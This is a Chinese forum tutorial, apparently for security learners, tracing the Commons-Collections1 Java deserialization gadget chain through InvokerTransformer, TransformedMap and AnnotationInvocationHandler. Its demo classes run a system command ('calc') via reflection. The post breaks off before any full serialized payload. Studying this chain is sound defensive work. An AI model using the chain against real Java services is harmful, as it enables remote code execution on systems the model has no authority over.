Commons-Collections1反序列化

用户国营  金牌会员 | 2023-4-4 14:05:20 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 648|帖子 648|积分 1944

JDK版本为jdk8u65

commons-collections版本为3.2.1

InvokerTransformer

CC1的漏洞点在InvokerTransformer,InvokerTransformer下有一个transform方法:
  1. public Object transform(Object input) {
  2.     if (input == null) {
  3.         return null;
  4.     }
  5.     try {
  6.         Class cls = input.getClass();
  7.         Method method = cls.getMethod(iMethodName, iParamTypes);
  8.         return method.invoke(input, iArgs);
  10.     } catch (NoSuchMethodException ex) {
  11.         throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist");
  12.     } catch (IllegalAccessException ex) {
  13.         throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
  14.     } catch (InvocationTargetException ex) {
  15.         throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex);
  16.     }
  17. }
复制代码
这里的transform接受一个任意的Object类型输入,而且反射调用的参数都可以控制,那么这里就可以实现任意方法调用。
先写一个通过反射调用函数的demo:
  1. package org.example;
  2. import org.apache.commons.collections.functors.InvokerTransformer;
  4. import java.lang.reflect.Method;
  6. public class CC1 {
  7.     public static void main(String[] args) throws Exception{
  8.         // 创建Runtime对象
  9.         Runtime r = Runtime.getRuntime();
  10.         // 创建Class对象
  11.         Class c = Runtime.class;
  12.         // 使用getMethod方法从Runtime类中获取exec方法
  13.         Method method = c.getMethod("exec", String.class);
  14.         // 使用invoke方法调用method对象表示的方法
  15.         method.invoke(r,"calc");
  16.     }
  17. }
复制代码

接着,将这个demo改写为通过InvokerTransformer调用,先看一下调用InvokerTransformer需要传什么参数,结合上面InvokerTransformer中transform方法,我们应该传的参数为:"exec"、new Class[]{String.class}、new Object[]{"calc"}
  1. public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
  2.     super();
  3.     iMethodName = methodName;
  4.     iParamTypes = paramTypes;
  5.     iArgs = args;
  6. }
复制代码
那么将我们的demo改写为:
  1. package org.example;
  2. import org.apache.commons.collections.functors.InvokerTransformer;
  4. public class CC1 {
  5.     public static void main(String[] args) throws Exception{
  6.         Runtime r = Runtime.getRuntime();
  8.         new InvokerTransformer("exec",new Class[]{String.class}, new Object[]{"calc"}).transform(r);
  9.     }
  10. }
复制代码

下一步的目标就是寻找哪个类也调用了transform方法。
TransformedMap

这里发现TransformedMap类中的checkSetValue函数中对valueTransformer调用了transform方法:
  1. protected Object checkSetValue(Object value) {
  2.     return valueTransformer.transform(value);
  3. }
复制代码
接着,在TransformedMap中发现下面这段代码调用了valueTransformer :
  1. protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {
  2.     super(map);
  3.     this.keyTransformer = keyTransformer;
  4.     this.valueTransformer = valueTransformer;
  5. }
复制代码
然后又发现下面这段代码调用了TransformedMap:
  1. public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {
  2.     return new TransformedMap(map, keyTransformer, valueTransformer);
  3. }
复制代码
于是,可以将demo改写为:
  1. package org.example;
  2. import org.apache.commons.collections.functors.InvokerTransformer;
  3. import org.apache.commons.collections.map.TransformedMap;
  5. import java.util.HashMap;
  7. public class CC1 {
  8.     public static void main(String[] args) throws Exception{
  9.         Runtime r = Runtime.getRuntime();
  11.         InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class[]{String.class}, new Object[]{"calc"});
  13.         HashMap<Object, Object> map = new HashMap<>();
  14.         TransformedMap.decorate(map, null, invokerTransformer);
  15.     }
  16. }
复制代码
AbstractInputCheckedMapDecorator

接下来,需要找到如何调用checkSetValue,通过idea查找用法发现在抽象类AbstractInputCheckedMapDecorator中的MapEntry类调用了这个方法。
  1. static class MapEntry extends AbstractMapEntryDecorator {
  3.     /** The parent map */
  4.     private final AbstractInputCheckedMapDecorator parent;
  6.     protected MapEntry(Map.Entry entry, AbstractInputCheckedMapDecorator parent) {
  7.         super(entry);
  8.         this.parent = parent;
  9.     }
  11.     public Object setValue(Object value) {
  12.         value = parent.checkSetValue(value);
  13.         return entry.setValue(value);
  14.     }
  15. }
复制代码
这里的MapEntry在遍历Map的时候会被调用,接着改写demo代码:
  1. package org.example;
  2. import org.apache.commons.collections.functors.InvokerTransformer;
  3. import org.apache.commons.collections.map.TransformedMap;
  5. import java.util.HashMap;
  6. import java.util.Map;
  8. public class CC1 {
  9.     public static void main(String[] args) throws Exception{
  10.         Runtime r = Runtime.getRuntime();
  12.         InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class[]{String.class}, new Object[]{"calc"});
  14.         HashMap<Object, Object> map = new HashMap<>();
  15.         map.put("key", "aaa");
  16.         Map<Object, Object> transformedMap = TransformedMap.decorate(map, null, invokerTransformer);
  18.         for (Map.Entry entry:transformedMap.entrySet()) {
  19.             entry.setValue(r);
  20.         }
  21.     }
  22. }
复制代码
这样一来,当我们遍历Map进行setValue的时候就会形成一条调用链:MapEntry -> setValue -> checkSetValue -> valueTransformer.transform,而valueTransformer就是我们通过TransformedMap.decorate(map, null, invokerTransformer)设置的invokerTransformer。
调试一下demo代码:

AnnotationInvocationHandler

继续寻找在哪个类里面调用了setValue方法,发现在AnnotationInvocationHandler类的readObject方法中使用了memberValue.setValue:
  1. private void readObject(java.io.ObjectInputStream s)
  2.     throws java.io.IOException, ClassNotFoundException {
  3.     s.defaultReadObject();
  5.     // Check to make sure that types have not evolved incompatibly
  7.     AnnotationType annotationType = null;
  8.     try {
  9.         annotationType = AnnotationType.getInstance(type);
  10.     } catch(IllegalArgumentException e) {
  11.         // Class is no longer an annotation type; time to punch out
  12.         throw new java.io.InvalidObjectException("Non-annotation type in annotation serial stream");
  13.     }
  15.     Map<String, Class<?>> memberTypes = annotationType.memberTypes();
  17.     // If there are annotation members without values, that
  18.     // situation is handled by the invoke method.
  19.     for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
  20.         String name = memberValue.getKey();
  21.         Class<?> memberType = memberTypes.get(name);
  22.         if (memberType != null) {  // i.e. member still exists
  23.             Object value = memberValue.getValue();
  24.             if (!(memberType.isInstance(value) ||
  25.                   value instanceof ExceptionProxy)) {
  26.                 memberValue.setValue(
  27.                     new AnnotationTypeMismatchExceptionProxy(
  28.                         value.getClass() + "[" + value + "]").setMember(
  29.                             annotationType.members().get(name)));
  30.             }
  31.         }
  32.     }
  33. }
复制代码
通过观察AnnotationInvocationHandler类可以发现memberValues是可控的:
[code]AnnotationInvocationHandler(Class

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

用户国营

金牌会员
这个人很懒什么都没写!

楼主热帖

标签云

挺好的 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表